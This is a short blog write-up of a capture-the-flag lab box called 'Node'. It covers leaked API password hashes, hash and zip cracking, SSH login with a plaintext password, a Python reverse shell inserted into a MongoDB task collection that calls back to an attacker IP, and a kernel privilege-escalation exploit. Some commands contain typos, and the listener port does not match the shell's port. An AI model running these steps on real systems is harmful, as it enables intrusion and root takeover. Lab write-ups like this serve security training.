NODE

Burak Dirlik
3 min readJul 25, 2024

Lets start with Nmap scan

nmap -sV -sC -O -T4 -o result.txt 10.129.31.121 -Pn

Port 3000 is open there is a welcome page and login panel.

When we examine the source code of the login page and go to every endpoint we realize that there are some user credentials at the specific endpoint.

  1. /login
  2. /login has /assets/js/app/contollers/home.js
  3. /assets/js/app/contollers/home.js has /api/users/latest
  4. /api/users/latest has user credentials like username and password hashes.

When we go up in the directory we find other user information comes up. /api/users

Let's crack password hashes, starting with the admin user, firstly we need to learn the type of hash, I used https://crackstation.net and this is a sha256 hash.

Let's verify the hash of manchester with Kali. After that, I am looking /admin directory and there is a backup file.

echo -n "manchester" | sha256s

But it is asking password, lets crack.

frackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace-decoded.backup 

We found the password and there are some MongoDB credentials in these files.

I noted these credentials and made connection.

ssh mark@10.129.31.121
password 5AYRft73VtFpc84k

The task collection has no documents. Let’s add one that establishes a reverse shell connection to our attack machine.

# insert document that contains a reverse shell
db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.77\",77));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})# double check that the document got added properly.
db.tasks.find()

---

nc -nlvp 8888

There are many privilege escalation methods for this box but most of them are so complex, that is why I found an easy way.

This machine running Ubuntu 4.4.o and has local privilege escalation vulnerability. Let's get this c code, send it to the target machine, and compile it over there.

gcc 44298.c -o shell
chmod +x shell
./shell

and we became root.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Burak Dirlik
Burak Dirlik

Written by Burak Dirlik

Computer Engineer & Penetration Tester

No responses yet

Write a response